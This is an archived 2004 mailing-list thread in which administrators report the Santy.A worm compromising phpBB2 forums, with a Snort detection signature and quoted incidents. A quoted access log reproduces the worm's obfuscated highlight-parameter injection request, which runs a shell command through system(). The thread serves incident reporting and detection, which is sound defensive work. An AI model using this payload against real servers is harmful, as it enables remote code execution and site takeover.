RE: Worm hitting PHPbb2 Forums

From: M. Shirk (shirkdog_list_at_hotmail.com)
Date: 12/22/04

  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-Disclosure] RE: Worm hitting PHPbb2 Forums" 
    To: incidents@securityfocus.com
Date: Tue, 21 Dec 2004 19:53:09 -0500

    I missed an important "F" on my previous post for these snort sigs.

    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE
    phpBB Highlighting Code Execution - Santy.A Worm";
    flow:to_server,established; uricontent:"/viewtopic.php?"; nocase;
    uricontent:"&highlight='.fwrite(fopen("; nocase;
    reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513; sid:9999999;
    rev:1;)

    Shirkdog
    http://www.shirkdog.us

    >From: "Mike" <mike_sha@shaw.ca>
    >To: <mark@onnow.net>, "L. Walker" <lwalker@magi.net.au>
    >CC: <incidents@securityfocus.com>, <full-disclosure@lists.netsys.com>
    >Subject: RE: Worm hitting PHPbb2 Forums
    >Date: Tue, 21 Dec 2004 13:28:27 -0500
    >
    >Does this affect PHPBB2 in general, or is it platform specific as well?
    >
    >Mike Fetherston
    >
    > > -----Original Message-----
    > > From: mark@onnow.net [mailto:mark@onnow.net]
    > > Sent: Tuesday, December 21, 2004 12:47 PM
    > > To: L. Walker
    > > Cc: incidents@securityfocus.com; full-disclosure@lists.netsys.com
    > > Subject: Re: Worm hitting PHPbb2 Forums
    > >
    > > Front what I have read, this can happen in any phpbb version lower
    >than
    > > 2.0.11
    > >
    > > This exploit is becoming frequent. Normally uploading a ddos bot.
    > >
    > > Mark
    > >
    > > Quoting "L. Walker" <lwalker@magi.net.au>:
    > >
    > > > Just spotted two clients hit by this. One client didnt update his
    > > > software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation
    >16.
    > > > Chkrootkit says its Adore, however could be something else.
    >Datacenter
    > > > wasn't very smart and has since wiped the server, so no binaries or
    > > other
    > > > evidence.
    > > >
    > > > Generation 12 only wiped out PHP files, replacing them with its own
    > > > message on other client's PHPbb2 forum. Access logs show:
    > > >
    > > > 66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
    > > >
    > >
    >/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlig
    >ht
    > >
    >=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252ech
    >r(
    > >
    >32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252ech
    >r(
    > >
    >112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252ec
    >hr
    > >
    >(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252ec
    >hr
    > >
    >(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252
    >ec
    > >
    >hr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252
    >ec
    > >
    >hr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%
    >25
    > >
    >2echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%
    >25
    > >
    >2echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106
    >)%
    > >
    >252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78
    >)%
    > > 252echr(41)%252echr(34))%252e%2527
    > > > HTTP/1.0" 200 270
    > > >
    > >
    >"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5
    >ac
    > >
    >a2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252ech
    >r(
    > >
    >114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252ec
    >hr
    > >
    >(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252
    >ec
    > >
    >hr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252e
    >ch
    > >
    >r(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252
    >ec
    > >
    >hr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%25
    >2e
    > >
    >chr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)
    >%2
    > >
    >52echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)
    >%2
    > >
    >52echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(12
    >2)
    > >
    >%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(9
    >7)
    > > %252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527"
    > > > "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    > > >
    > > > --
    > > > L. Walker <lwalker at magi dot net dot au>
    > > > Network Administrator / Consultant
    > > > --
    > > >
    > >
    > >
    > >
    > >
    > > ----------------------------------------------------------------
    > > This message was sent using IMP, the Internet Messaging Program.
    >

    _________________________________________________________________
    FREE pop-up blocking with the new MSN Toolbar – get it now!
    http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/

  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-Disclosure] RE: Worm hitting PHPbb2 Forums"